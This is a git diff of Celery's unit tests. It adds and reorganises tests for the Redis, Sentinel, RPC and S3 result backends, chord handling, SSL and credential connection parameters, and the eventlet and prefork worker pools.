from celery.backends.redis import RedisBackend
@@ -287,11 +300,43 @@ def get_E_LOST(self):
from celery.backends.redis import E_LOST
return E_LOST
+ def create_task(self, i, group_id="group_id"):
+ tid = uuid()
+ task = Mock(name=f'task-{tid}')
+ task.name = 'foobarbaz'
+ self.app.tasks['foobarbaz'] = task
+ task.request.chord = signature(task)
+ task.request.id = tid
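+        # chord size is now tracked by the backend rather than on the chord signature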
+ self.b.set_chord_size(group_id, 10)
+ task.request.group = group_id
+ task.request.group_index = i
+ return task
+
+ @contextmanager
+ def chord_context(self, size=1):
+ with patch('celery.backends.redis.maybe_signature') as ms:
+ request = Mock(name='request')
+ request.id = 'id1'
+ group_id = 'gid1'
+ request.group = group_id
+ request.group_index = None
+ tasks = [
+ self.create_task(i, group_id=request.group)
+ for i in range(size)
+ ]
+ callback = ms.return_value = Signature('add')
+ callback.id = 'id1'
+ self.b.set_chord_size(group_id, size)
+ callback.delay = Mock(name='callback.delay')
+ yield tasks, request, callback
+
def setup(self):
self.Backend = self.get_backend()
self.E_LOST = self.get_E_LOST()
self.b = self.Backend(app=self.app)
+
+class test_RedisBackend(basetest_RedisBackend):
@pytest.mark.usefixtures('depends_on_current_app')
def test_reduce(self):
pytest.importorskip('redis')
@@ -305,6 +350,20 @@ def test_no_redis(self):
with pytest.raises(ImproperlyConfigured):
self.Backend(app=self.app)
+ def test_username_password_from_redis_conf(self):
+ self.app.conf.redis_password = 'password'
+ x = self.Backend(app=self.app)
+
+ assert x.connparams
+ assert 'username' not in x.connparams
+ assert x.connparams['password'] == 'password'
+ self.app.conf.redis_username = 'username'
+ x = self.Backend(app=self.app)
+
+ assert x.connparams
+ assert x.connparams['username'] == 'username'
+ assert x.connparams['password'] == 'password'
+
def test_url(self):
self.app.conf.redis_socket_timeout = 30.0
self.app.conf.redis_socket_connect_timeout = 100.0
@@ -318,6 +377,19 @@ def test_url(self):
assert x.connparams['password'] == 'bosco'
assert x.connparams['socket_timeout'] == 30.0
assert x.connparams['socket_connect_timeout'] == 100.0
+ assert 'username' not in x.connparams
+
+ x = self.Backend(
+ 'redis://username:bosco@vandelay.com:123//1', app=self.app,
+ )
+ assert x.connparams
+ assert x.connparams['host'] == 'vandelay.com'
+ assert x.connparams['db'] == 1
+ assert x.connparams['port'] == 123
+ assert x.connparams['username'] == 'username'
+ assert x.connparams['password'] == 'bosco'
+ assert x.connparams['socket_timeout'] == 30.0
+ assert x.connparams['socket_connect_timeout'] == 100.0
def test_timeouts_in_url_coerced(self):
pytest.importorskip('redis')
@@ -383,6 +455,54 @@ def test_backend_ssl(self):
from redis.connection import SSLConnection
assert x.connparams['connection_class'] is SSLConnection
+ def test_backend_health_check_interval_ssl(self):
+ pytest.importorskip('redis')
+
+ self.app.conf.redis_backend_use_ssl = {
+ 'ssl_cert_reqs': ssl.CERT_REQUIRED,
+ 'ssl_ca_certs': '/path/to/ca.crt',
+ 'ssl_certfile': '/path/to/client.crt',
+ 'ssl_keyfile': '/path/to/client.key',
+ }
+ self.app.conf.redis_backend_health_check_interval = 10
+ x = self.Backend(
+ 'rediss://:bosco@vandelay.com:123//1', app=self.app,
+ )
+ assert x.connparams
+ assert x.connparams['host'] == 'vandelay.com'
+ assert x.connparams['db'] == 1
+ assert x.connparams['port'] == 123
+ assert x.connparams['password'] == 'bosco'
+ assert x.connparams['health_check_interval'] == 10
+
+ from redis.connection import SSLConnection
+ assert x.connparams['connection_class'] is SSLConnection
+
+ def test_backend_health_check_interval(self):
+ pytest.importorskip('redis')
+
+ self.app.conf.redis_backend_health_check_interval = 10
+ x = self.Backend(
+ 'redis://vandelay.com:123//1', app=self.app,
+ )
+ assert x.connparams
+ assert x.connparams['host'] == 'vandelay.com'
+ assert x.connparams['db'] == 1
+ assert x.connparams['port'] == 123
+ assert x.connparams['health_check_interval'] == 10
+
+ def test_backend_health_check_interval_not_set(self):
+ pytest.importorskip('redis')
+
+ x = self.Backend(
+ 'redis://vandelay.com:123//1', app=self.app,
+ )
+ assert x.connparams
+ assert x.connparams['host'] == 'vandelay.com'
+ assert x.connparams['db'] == 1
+ assert x.connparams['port'] == 123
+ assert "health_check_interval" not in x.connparams
+
@pytest.mark.parametrize('cert_str', [
"required",
"CERT_REQUIRED",
@@ -558,11 +678,11 @@ def test_expire(self):
def test_apply_chord(self, unlock='celery.chord_unlock'):
self.app.tasks[unlock] = Mock()
- header_result = self.app.GroupResult(
+ header_result_args = (
uuid(),
[self.app.AsyncResult(x) for x in range(3)],
)
- self.b.apply_chord(header_result, None)
+ self.b.apply_chord(header_result_args, None)
assert self.app.tasks[unlock].apply_async.call_count == 0
def test_unpack_chord_result(self):
@@ -607,6 +727,12 @@ def test_add_to_chord(self):
b.add_to_chord(gid, 'sig')
b.client.incr.assert_called_with(b.get_key_for_group(gid, '.t'), 1)
+ def test_set_chord_size(self):
+ b = self.Backend('redis://', app=self.app)
+ gid = uuid()
+ b.set_chord_size(gid, 10)
+ b.client.set.assert_called_with(b.get_key_for_group(gid, '.s'), 10)
+
def test_expires_is_None(self):
b = self.Backend(expires=None, app=self.app)
assert b.expires == self.app.conf.result_expires.total_seconds()
@@ -623,20 +749,40 @@ def test_set_no_expire(self):
self.b.expires = None
self.b._set_with_state('foo', 'bar', states.SUCCESS)
- def create_task(self, i):
+ def test_process_cleanup(self):
+ self.b.process_cleanup()
+
+ def test_get_set_forget(self):
tid = uuid()
- task = Mock(name=f'task-{tid}')
- task.name = 'foobarbaz'
- self.app.tasks['foobarbaz'] = task
- task.request.chord = signature(task)
- task.request.id = tid
- task.request.chord['chord_size'] = 10
- task.request.group = 'group_id'
- task.request.group_index = i
- return task
+ self.b.store_result(tid, 42, states.SUCCESS)
+ assert self.b.get_state(tid) == states.SUCCESS
+ assert self.b.get_result(tid) == 42
+ self.b.forget(tid)
+ assert self.b.get_state(tid) == states.PENDING
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return(self, restore):
+ def test_set_expires(self):
+ self.b = self.Backend(expires=512, app=self.app)
+ tid = uuid()
+ key = self.b.get_key_for_task(tid)
+ self.b.store_result(tid, 42, states.SUCCESS)
+ self.b.client.expire.assert_called_with(
+ key, 512,
+ )
+
+ def test_set_raises_error_on_large_value(self):
+ with pytest.raises(BackendStoreError):
+ self.b.set('key', 'x' * (self.b._MAX_STR_VALUE_SIZE + 1))
+
+
+class test_RedisBackend_chords_simple(basetest_RedisBackend):
+ @pytest.fixture(scope="class", autouse=True)
+ def simple_header_result(self):
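+        # simple headers are expected to have no saved GroupResult, so restore() yields None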
+ with patch(
+ "celery.result.GroupResult.restore", return_value=None,
+ ) as p:
+ yield p
+
+ def test_on_chord_part_return(self):
tasks = [self.create_task(i) for i in range(10)]
random.shuffle(tasks)
@@ -647,13 +793,13 @@ def test_on_chord_part_return(self, restore):
assert self.b.client.zrangebyscore.call_count
jkey = self.b.get_key_for_group('group_id', '.j')
tkey = self.b.get_key_for_group('group_id', '.t')
- self.b.client.delete.assert_has_calls([call(jkey), call(tkey)])
+ skey = self.b.get_key_for_group('group_id', '.s')
+ self.b.client.delete.assert_has_calls([call(jkey), call(tkey), call(skey)])
self.b.client.expire.assert_has_calls([
- call(jkey, 86400), call(tkey, 86400),
+ call(jkey, 86400), call(tkey, 86400), call(skey, 86400),
])
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return__unordered(self, restore):
+ def test_on_chord_part_return__unordered(self):
self.app.conf.result_backend_transport_options = dict(
result_chord_ordered=False,
)
@@ -673,8 +819,7 @@ def test_on_chord_part_return__unordered(self, restore):
call(jkey, 86400), call(tkey, 86400),
])
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return__ordered(self, restore):
+ def test_on_chord_part_return__ordered(self):
self.app.conf.result_backend_transport_options = dict(
result_chord_ordered=True,
)
@@ -694,11 +839,28 @@ def test_on_chord_part_return__ordered(self, restore):
call(jkey, 86400), call(tkey, 86400),
])
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return_no_expiry(self, restore):
+ def test_on_chord_part_return_no_expiry(self):
old_expires = self.b.expires
self.b.expires = None
tasks = [self.create_task(i) for i in range(10)]
+ self.b.set_chord_size('group_id', 10)
+
+ for i in range(10):
+ self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i)
+ assert self.b.client.zadd.call_count
+ self.b.client.zadd.reset_mock()
+ assert self.b.client.zrangebyscore.call_count
+ jkey = self.b.get_key_for_group('group_id', '.j')
+ tkey = self.b.get_key_for_group('group_id', '.t')
+ self.b.client.delete.assert_has_calls([call(jkey), call(tkey)])
+ self.b.client.expire.assert_not_called()
+
+ self.b.expires = old_expires
+
+ def test_on_chord_part_return_expire_set_to_zero(self):
+ old_expires = self.b.expires
+ self.b.expires = 0
+ tasks = [self.create_task(i) for i in range(10)]
for i in range(10):
self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i)
@@ -712,8 +874,7 @@ def test_on_chord_part_return_no_expiry(self, restore):
self.b.expires = old_expires
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return_no_expiry__unordered(self, restore):
+ def test_on_chord_part_return_no_expiry__unordered(self):
self.app.conf.result_backend_transport_options = dict(
result_chord_ordered=False,
)
@@ -734,8 +895,7 @@ def test_on_chord_part_return_no_expiry__unordered(self, restore):
self.b.expires = old_expires
- @patch('celery.result.GroupResult.restore')
- def test_on_chord_part_return_no_expiry__ordered(self, restore):
+ def test_on_chord_part_return_no_expiry__ordered(self):
self.app.conf.result_backend_transport_options = dict(
result_chord_ordered=True,
)
@@ -824,8 +984,8 @@ def test_on_chord_part_return__ChordError(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, ChordError())
- self.b.client.pipeline.return_value.zadd().zcount().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.zadd().zcount().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
@@ -840,8 +1000,8 @@ def test_on_chord_part_return__ChordError__unordered(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, ChordError())
- self.b.client.pipeline.return_value.rpush().llen().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.rpush().llen().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
@@ -856,8 +1016,8 @@ def test_on_chord_part_return__ChordError__ordered(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, ChordError())
- self.b.client.pipeline.return_value.zadd().zcount().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.zadd().zcount().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
@@ -868,8 +1028,8 @@ def test_on_chord_part_return__other_error(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, RuntimeError())
- self.b.client.pipeline.return_value.zadd().zcount().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.zadd().zcount().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
@@ -884,8 +1044,8 @@ def test_on_chord_part_return__other_error__unordered(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, RuntimeError())
- self.b.client.pipeline.return_value.rpush().llen().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.rpush().llen().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
@@ -900,47 +1060,95 @@ def test_on_chord_part_return__other_error__ordered(self):
with self.chord_context(1) as (_, request, callback):
self.b.client.pipeline = ContextMock()
raise_on_second_call(self.b.client.pipeline, RuntimeError())
- self.b.client.pipeline.return_value.zadd().zcount().get().expire(
- ).expire().execute.return_value = (1, 1, 0, 4, 5)
+ self.b.client.pipeline.return_value.zadd().zcount().get().get().expire(
+ ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6)
task = self.app._tasks['add'] = Mock(name='add_task')
self.b.on_chord_part_return(request, states.SUCCESS, 10)
task.backend.fail_from_current_stack.assert_called_with(
callback.id, exc=ANY,
)
- @contextmanager
- def chord_context(self, size=1):
- with patch('celery.backends.redis.maybe_signature') as ms:
- tasks = [self.create_task(i) for i in range(size)]
- request = Mock(name='request')
- request.id = 'id1'
- request.group = 'gid1'
- request.group_index = None
- callback = ms.return_value = Signature('add')
- callback.id = 'id1'
- callback['chord_size'] = size
- callback.delay = Mock(name='callback.delay')
- yield tasks, request, callback
- def test_process_cleanup(self):
- self.b.process_cleanup()
+class test_RedisBackend_chords_complex(basetest_RedisBackend):
+ @pytest.fixture(scope="function", autouse=True)
+ def complex_header_result(self):
+ with patch("celery.result.GroupResult.restore") as p:
+ yield p
+
+ @pytest.mark.parametrize(['results', 'assert_save_called'], [
+ # No results in the header at all - won't call `save()`
+ (tuple(), False),
+ # Simple results in the header - won't call `save()`
+ ((AsyncResult("foo"), ), False),
+ # Many simple results in the header - won't call `save()`
+ ((AsyncResult("foo"), ) * 42, False),
+ # A single complex result in the header - will call `save()`
+ ((GroupResult("foo", []),), True),
+ # Many complex results in the header - will call `save()`
+ ((GroupResult("foo"), ) * 42, True),
+ # Mixed simple and complex results in the header - will call `save()`
+ (itertools.islice(
+ itertools.cycle((
+ AsyncResult("foo"), GroupResult("foo"),
+ )), 42,
+ ), True),
+ ])
+ def test_apply_chord_complex_header(self, results, assert_save_called):
+ mock_group_result = Mock()
+ mock_group_result.return_value.results = results
+ self.app.GroupResult = mock_group_result
+ header_result_args = ("gid11", results)
+ self.b.apply_chord(header_result_args, None)
+ if assert_save_called:
+ mock_group_result.return_value.save.assert_called_once_with(backend=self.b)
+ else:
+ mock_group_result.return_value.save.assert_not_called()
+
+ def test_on_chord_part_return_timeout(self, complex_header_result):
+ tasks = [self.create_task(i) for i in range(10)]
+ random.shuffle(tasks)
+ try:
+ self.app.conf.result_chord_join_timeout += 1.0
+ for task, result_val in zip(tasks, itertools.cycle((42, ))):
+ self.b.on_chord_part_return(
+ task.request, states.SUCCESS, result_val,
+ )
+ finally:
+ self.app.conf.result_chord_join_timeout -= 1.0
+
+ join_func = complex_header_result.return_value.join_native
+ join_func.assert_called_once_with(timeout=4.0, propagate=True)
+
+ @pytest.mark.parametrize("supports_native_join", (True, False))
+ def test_on_chord_part_return(
+ self, complex_header_result, supports_native_join,
+ ):
+ mock_result_obj = complex_header_result.return_value
+ mock_result_obj.supports_native_join = supports_native_join
- def test_get_set_forget(self):
- tid = uuid()
- self.b.store_result(tid, 42, states.SUCCESS)
- assert self.b.get_state(tid) == states.SUCCESS
- assert self.b.get_result(tid) == 42
- self.b.forget(tid)
- assert self.b.get_state(tid) == states.PENDING
+ tasks = [self.create_task(i) for i in range(10)]
+ random.shuffle(tasks)
- def test_set_expires(self):
- self.b = self.Backend(expires=512, app=self.app)
- tid = uuid()
- key = self.b.get_key_for_task(tid)
- self.b.store_result(tid, 42, states.SUCCESS)
- self.b.client.expire.assert_called_with(
- key, 512,
- )
+ with self.chord_context(10) as (tasks, request, callback):
+ for task, result_val in zip(tasks, itertools.cycle((42, ))):
+ self.b.on_chord_part_return(
+ task.request, states.SUCCESS, result_val,
+ )
+ # Confirm that `zadd` was called even though we won't end up
+ # using the data pushed into the sorted set
+ assert self.b.client.zadd.call_count == 1
+ self.b.client.zadd.reset_mock()
+            # Confirm that neither `zrange` nor `lrange` were called
+ self.b.client.zrange.assert_not_called()
+ self.b.client.lrange.assert_not_called()
+ # Confirm that the `GroupResult.restore` mock was called
+ complex_header_result.assert_called_once_with(request.group)
+            # Confirm that the callback was called with the `join()`ed group result
+ if supports_native_join:
+ expected_join = mock_result_obj.join_native
+ else:
+ expected_join = mock_result_obj.join
+ callback.delay.assert_called_once_with(expected_join())
class test_SentinelBackend:
@@ -1005,6 +1213,16 @@ def test_url(self):
found_dbs = [cp['db'] for cp in x.connparams['hosts']]
assert found_dbs == expected_dbs
+ # By default passwords should be sanitized
+ display_url = x.as_uri()
+ assert "test" not in display_url
+ # We can choose not to sanitize with the `include_password` argument
+ unsanitized_display_url = x.as_uri(include_password=True)
+ assert unsanitized_display_url == x.url
+ # or to explicitly sanitize
+ forcibly_sanitized_display_url = x.as_uri(include_password=False)
+ assert forcibly_sanitized_display_url == display_url
+
def test_get_sentinel_instance(self):
x = self.Backend(
'sentinel://:test@github.com:123/1;'
@@ -1025,3 +1243,34 @@ def test_get_pool(self):
)
pool = x._get_pool(**x.connparams)
assert pool
+
+ def test_backend_ssl(self):
+ pytest.importorskip('redis')
+
+ from celery.backends.redis import SentinelBackend
+ self.app.conf.redis_backend_use_ssl = {
+ 'ssl_cert_reqs': "CERT_REQUIRED",
+ 'ssl_ca_certs': '/path/to/ca.crt',
+ 'ssl_certfile': '/path/to/client.crt',
+ 'ssl_keyfile': '/path/to/client.key',
+ }
+ self.app.conf.redis_socket_timeout = 30.0
+ self.app.conf.redis_socket_connect_timeout = 100.0
+ x = SentinelBackend(
+ 'sentinel://:bosco@vandelay.com:123//1', app=self.app,
+ )
+ assert x.connparams
+ assert len(x.connparams['hosts']) == 1
+ assert x.connparams['hosts'][0]['host'] == 'vandelay.com'
+ assert x.connparams['hosts'][0]['db'] == 1
+ assert x.connparams['hosts'][0]['port'] == 123
+ assert x.connparams['hosts'][0]['password'] == 'bosco'
+ assert x.connparams['socket_timeout'] == 30.0
+ assert x.connparams['socket_connect_timeout'] == 100.0
+ assert x.connparams['ssl_cert_reqs'] == ssl.CERT_REQUIRED
+ assert x.connparams['ssl_ca_certs'] == '/path/to/ca.crt'
+ assert x.connparams['ssl_certfile'] == '/path/to/client.crt'
+ assert x.connparams['ssl_keyfile'] == '/path/to/client.key'
+
+ from celery.backends.redis import SentinelManagedSSLConnection
+ assert x.connparams['connection_class'] is SentinelManagedSSLConnection
diff --git a/t/unit/backends/test_rpc.py b/t/unit/backends/test_rpc.py
index f8567400706..71e573da8ff 100644
--- a/t/unit/backends/test_rpc.py
+++ b/t/unit/backends/test_rpc.py
@@ -1,3 +1,4 @@
+import uuid
from unittest.mock import Mock, patch
import pytest
@@ -28,8 +29,22 @@ def setup(self):
def test_oid(self):
oid = self.b.oid
oid2 = self.b.oid
+ assert uuid.UUID(oid)
assert oid == oid2
- assert oid == self.app.oid
+ assert oid == self.app.thread_oid
+
+ def test_oid_threads(self):
+ # Verify that two RPC backends executed in different threads
+        # have different oids.
+ oid = self.b.oid
+ from concurrent.futures import ThreadPoolExecutor
+ with ThreadPoolExecutor(max_workers=1) as executor:
+ future = executor.submit(lambda: RPCBackend(app=self.app).oid)
+ thread_oid = future.result()
+ assert uuid.UUID(oid)
+ assert uuid.UUID(thread_oid)
+ assert oid == self.app.thread_oid
+ assert thread_oid != oid
def test_interface(self):
self.b.on_reply_declare('task_id')
diff --git a/t/unit/backends/test_s3.py b/t/unit/backends/test_s3.py
index 5733bb6fca4..fdea04b32cc 100644
--- a/t/unit/backends/test_s3.py
+++ b/t/unit/backends/test_s3.py
@@ -140,8 +140,9 @@ def test_with_error_while_getting_key(self, mock_boto3):
with pytest.raises(ClientError):
s3_backend.get('uuidddd')
+ @pytest.mark.parametrize("key", ['uuid', b'uuid'])
@mock_s3
- def test_delete_a_key(self):
+ def test_delete_a_key(self, key):
self._mock_s3_resource()
self.app.conf.s3_access_key_id = 'somekeyid'
@@ -149,12 +150,12 @@ def test_delete_a_key(self):
self.app.conf.s3_bucket = 'bucket'
s3_backend = S3Backend(app=self.app)
- s3_backend._set_with_state('uuid', 'another_status', states.SUCCESS)
- assert s3_backend.get('uuid') == 'another_status'
+ s3_backend._set_with_state(key, 'another_status', states.SUCCESS)
+ assert s3_backend.get(key) == 'another_status'
- s3_backend.delete('uuid')
+ s3_backend.delete(key)
- assert s3_backend.get('uuid') is None
+ assert s3_backend.get(key) is None
@mock_s3
def test_with_a_non_existing_bucket(self):
diff --git a/t/unit/concurrency/test_concurrency.py b/t/unit/concurrency/test_concurrency.py
index a48ef83ce49..1a3267bfabf 100644
--- a/t/unit/concurrency/test_concurrency.py
+++ b/t/unit/concurrency/test_concurrency.py
@@ -1,9 +1,12 @@
+import importlib
import os
+import sys
from itertools import count
from unittest.mock import Mock, patch
import pytest
+from celery import concurrency
from celery.concurrency.base import BasePool, apply_target
from celery.exceptions import WorkerShutdown, WorkerTerminate
@@ -152,3 +155,31 @@ def test_interface_close(self):
def test_interface_no_close(self):
assert BasePool(10).on_close() is None
+
+
+class test_get_available_pool_names:
+
+ def test_no_concurrent_futures__returns_no_threads_pool_name(self):
+ expected_pool_names = (
+ 'prefork',
+ 'eventlet',
+ 'gevent',
+ 'solo',
+ 'processes',
+ )
+ with patch.dict(sys.modules, {'concurrent.futures': None}):
+ importlib.reload(concurrency)
+ assert concurrency.get_available_pool_names() == expected_pool_names
+
+ def test_concurrent_futures__returns_threads_pool_name(self):
+ expected_pool_names = (
+ 'prefork',
+ 'eventlet',
+ 'gevent',
+ 'solo',
+ 'processes',
+ 'threads',
+ )
+ with patch.dict(sys.modules, {'concurrent.futures': Mock()}):
+ importlib.reload(concurrency)
+ assert concurrency.get_available_pool_names() == expected_pool_names
diff --git a/t/unit/concurrency/test_eventlet.py b/t/unit/concurrency/test_eventlet.py
index dcd803e5342..aff2d310368 100644
--- a/t/unit/concurrency/test_eventlet.py
+++ b/t/unit/concurrency/test_eventlet.py
@@ -3,8 +3,12 @@
import pytest
-import t.skip
-from celery.concurrency.eventlet import TaskPool, Timer, apply_target
+pytest.importorskip('eventlet')
+
+from greenlet import GreenletExit # noqa
+
+import t.skip # noqa
+from celery.concurrency.eventlet import TaskPool, Timer, apply_target # noqa
eventlet_modules = (
'eventlet',
@@ -14,8 +18,6 @@
'greenlet',
)
-pytest.importorskip('eventlet')
-
@t.skip.if_pypy
class EventletCase:
@@ -101,6 +103,7 @@ def test_pool(self):
x.on_apply(Mock())
x._pool = None
x.on_stop()
+ assert len(x._pool_map.keys()) == 1
assert x.getpid()
@patch('celery.concurrency.eventlet.base')
@@ -130,3 +133,32 @@ def test_get_info(self):
'free-threads': x._pool.free(),
'running-threads': x._pool.running(),
}
+
+ def test_terminate_job(self):
+ func = Mock()
+ pool = TaskPool(10)
+ pool.on_start()
+ pool.on_apply(func)
+
+ assert len(pool._pool_map.keys()) == 1
+ pid = list(pool._pool_map.keys())[0]
+ greenlet = pool._pool_map[pid]
+
+ pool.terminate_job(pid)
+ greenlet.link.assert_called_once()
+ greenlet.kill.assert_called_once()
+
+ def test_make_killable_target(self):
+ def valid_target():
+ return "some result..."
+
+ def terminating_target():
+ raise GreenletExit()
+
+ assert TaskPool._make_killable_target(valid_target)() == "some result..."
+ assert TaskPool._make_killable_target(terminating_target)() == (False, None, None)
+
+ def test_cleanup_after_job_finish(self):
+        pool_map = {'1': None}
+        TaskPool._cleanup_after_job_finish(None, pool_map, '1')
+        assert len(pool_map) == 0
diff --git a/t/unit/concurrency/test_prefork.py b/t/unit/concurrency/test_prefork.py
index 275d4f2f521..2e2a47353b7 100644
--- a/t/unit/concurrency/test_prefork.py
+++ b/t/unit/concurrency/test_prefork.py
@@ -5,7 +5,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
import t.skip
from celery.app.defaults import DEFAULTS
@@ -36,8 +35,8 @@ def stop(self):
def apply_async(self, *args, **kwargs):
pass
- mp = _mp() # noqa
- asynpool = None # noqa
+ mp = _mp()
+ asynpool = None
class MockResult:
@@ -53,52 +52,64 @@ def get(self):
return self.value
+@patch('celery.platforms.set_mp_process_title')
class test_process_initializer:
- @patch('celery.platforms.signals')
- @patch('celery.platforms.set_mp_process_title')
- def test_process_initializer(self, set_mp_process_title, _signals):
- with mock.restore_logging():
- from celery import signals
- from celery._state import _tls
- from celery.concurrency.prefork import (WORKER_SIGIGNORE,
- WORKER_SIGRESET,
- process_initializer)
- on_worker_process_init = Mock()
- signals.worker_process_init.connect(on_worker_process_init)
-
- def Loader(*args, **kwargs):
- loader = Mock(*args, **kwargs)
- loader.conf = {}
- loader.override_backends = {}
- return loader
-
- with self.Celery(loader=Loader) as app:
- app.conf = AttributeDict(DEFAULTS)
- process_initializer(app, 'awesome.worker.com')
- _signals.ignore.assert_any_call(*WORKER_SIGIGNORE)
- _signals.reset.assert_any_call(*WORKER_SIGRESET)
- assert app.loader.init_worker.call_count
- on_worker_process_init.assert_called()
- assert _tls.current_app is app
- set_mp_process_title.assert_called_with(
- 'celeryd', hostname='awesome.worker.com',
- )
+ @staticmethod
+ def Loader(*args, **kwargs):
+ loader = Mock(*args, **kwargs)
+ loader.conf = {}
+ loader.override_backends = {}
+ return loader
- with patch('celery.app.trace.setup_worker_optimizations') as S:
- os.environ['FORKED_BY_MULTIPROCESSING'] = '1'
- try:
- process_initializer(app, 'luke.worker.com')
- S.assert_called_with(app, 'luke.worker.com')
- finally:
- os.environ.pop('FORKED_BY_MULTIPROCESSING', None)
+ @patch('celery.platforms.signals')
+ def test_process_initializer(self, _signals, set_mp_process_title, restore_logging):
+ from celery import signals
+ from celery._state import _tls
+ from celery.concurrency.prefork import (WORKER_SIGIGNORE,
+ WORKER_SIGRESET,
+ process_initializer)
+ on_worker_process_init = Mock()
+ signals.worker_process_init.connect(on_worker_process_init)
+
+ with self.Celery(loader=self.Loader) as app:
+ app.conf = AttributeDict(DEFAULTS)
+ process_initializer(app, 'awesome.worker.com')
+ _signals.ignore.assert_any_call(*WORKER_SIGIGNORE)
+ _signals.reset.assert_any_call(*WORKER_SIGRESET)
+ assert app.loader.init_worker.call_count
+ on_worker_process_init.assert_called()
+ assert _tls.current_app is app
+ set_mp_process_title.assert_called_with(
+ 'celeryd', hostname='awesome.worker.com',
+ )
- os.environ['CELERY_LOG_FILE'] = 'worker%I.log'
- app.log.setup = Mock(name='log_setup')
+ with patch('celery.app.trace.setup_worker_optimizations') as S:
+ os.environ['FORKED_BY_MULTIPROCESSING'] = '1'
try:
process_initializer(app, 'luke.worker.com')
+ S.assert_called_with(app, 'luke.worker.com')
finally:
- os.environ.pop('CELERY_LOG_FILE', None)
+ os.environ.pop('FORKED_BY_MULTIPROCESSING', None)
+
+ os.environ['CELERY_LOG_FILE'] = 'worker%I.log'
+ app.log.setup = Mock(name='log_setup')
+ try:
+ process_initializer(app, 'luke.worker.com')
+ finally:
+ os.environ.pop('CELERY_LOG_FILE', None)
+
+ @patch('celery.platforms.set_pdeathsig')
+ def test_pdeath_sig(self, _set_pdeathsig, set_mp_process_title, restore_logging):
+ from celery import signals
+ on_worker_process_init = Mock()
+ signals.worker_process_init.connect(on_worker_process_init)
+ from celery.concurrency.prefork import process_initializer
+
+ with self.Celery(loader=self.Loader) as app:
+ app.conf = AttributeDict(DEFAULTS)
+ process_initializer(app, 'awesome.worker.com')
+ _set_pdeathsig.assert_called_once_with('SIGKILL')
class test_process_destructor:
diff --git a/t/unit/conftest.py b/t/unit/conftest.py
index d355fe31edd..458e9a2ebf0 100644
--- a/t/unit/conftest.py
+++ b/t/unit/conftest.py
@@ -1,13 +1,19 @@
+import builtins
+import inspect
+import io
import logging
import os
+import platform
import sys
import threading
+import types
import warnings
-from importlib import import_module
-from unittest.mock import Mock
+from contextlib import contextmanager
+from functools import wraps
+from importlib import import_module, reload
+from unittest.mock import MagicMock, Mock, patch
import pytest
-from case.utils import decorator
from kombu import Queue
from celery.backends.cache import CacheBackend, DummyClient
@@ -27,7 +33,7 @@
)
try:
- WindowsError = WindowsError # noqa
+ WindowsError = WindowsError
except NameError:
class WindowsError(Exception):
@@ -39,6 +45,24 @@ class WindowsError(Exception):
CASE_LOG_LEVEL_EFFECT = 'Test {0} modified the level of the root logger'
CASE_LOG_HANDLER_EFFECT = 'Test {0} modified handlers for the root logger'
+_SIO_write = io.StringIO.write
+_SIO_init = io.StringIO.__init__
+
+SENTINEL = object()
+
+
+def noop(*args, **kwargs):
+ pass
+
+
+class WhateverIO(io.StringIO):
+
+ def __init__(self, v=None, *a, **kw):
+ _SIO_init(self, v.decode() if isinstance(v, bytes) else v, *a, **kw)
+
+ def write(self, data):
+ _SIO_write(self, data.decode() if isinstance(data, bytes) else data)
+
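+# Illustrative only (not exercised by the suite): ``WhateverIO`` accepts
+# both text and bytes for construction and for writes, normalising
+# everything to str::
+#
+#     buf = WhateverIO(b'abc')
+#     buf.write(b'def')
+#     assert buf.getvalue() == 'abcdef'
+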
@pytest.fixture(scope='session')
def celery_config():
@@ -88,7 +112,7 @@ def reset_cache_backend_state(celery_app):
backend._cache.clear()
-@decorator
+@contextmanager
def assert_signal_called(signal, **expected):
"""Context that verifes signal is called before exiting."""
handler = Mock()
